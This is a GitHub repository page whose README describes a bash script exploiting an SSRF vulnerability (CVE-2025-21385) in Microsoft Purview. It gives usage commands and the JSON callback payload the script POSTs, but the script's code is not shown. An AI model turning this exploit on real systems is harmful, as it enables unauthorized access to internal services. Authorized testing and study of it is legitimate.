Skip to content

Pauloxc6/CVE-2025-21385

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
CVE-2025-21385.sh
CVE-2025-21385.sh
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

SSRF Exploit Script

This repository contains a script designed to perform an SSRF (Server-Side Request Forgery) exploit for testing and educational purposes. Use this tool responsibly and only in environments where you have explicit permission.

Features

  • Exploit SSRF vulnerabilities in target systems.
  • Validate input URLs to avoid misuse.
  • Easy-to-use CLI interface with clear error messages and help menu.

Requirements

  • bash (Unix shell)
  • jq (JSON processor)
  • curl (Command-line tool for HTTP requests)

Usage

Syntax

./script.sh --exploit <target_url> <purview_url>

Options

Option Description
-h, --help Show the help menu.
--exploit tu pu Perform the SSRF exploit with target and purview URLs.

Examples

Show Help Menu

./script.sh -h

Output:

Usage:
./script.sh --exploit <target_url> <purview_url>

Options:
-h, --help       - Show this help menu
--exploit <tu> <pu> - Perform the SSRF exploit with target and purview URLs

Perform SSRF Exploit

./script.sh --exploit http://example.com http://purview-url.com

Expected Output:

  • If successful: 
    SSRF exploit successful! Data retrieved:
<response data>
  • If unsuccessful: 
    SSRF exploit failed! HTTP code: <code>

Script Workflow

  1. The script parses the provided arguments.
  2. Validates the provided URLs for correctness.
  3. Sends an HTTP POST request with a JSON payload to the purview_url, attempting to exploit an SSRF vulnerability.
  4. Prints the HTTP response or an error message based on the result.

Example Workflow

Input

./script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com

Payload Sent

{
  "callback": "http://callback-url.com"
}

Response Handling

The HTTP response code and body are saved, and based on the status code, the success or failure of the exploit is determined.

Error Handling

  • If invalid or missing arguments are detected, the script provides detailed instructions via the help menu.
  • If URLs are malformed, an error message is displayed, and the execution stops.

Development Notes

This script is for testing purposes only. Misuse of this script can lead to severe legal consequences. Ensure compliance with all applicable laws and ethical standards.

Contribution

Feel free to contribute by creating pull requests or reporting issues.

License

GNU GPL v3

Disclaimer

This tool is intended for educational purposes and authorized penetration testing only. The author is not responsible for any misuse or damage caused by this tool.

About

The SSRF vulnerability in Microsoft Purview

Resources

Readme

License

GPL-3.0 license
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages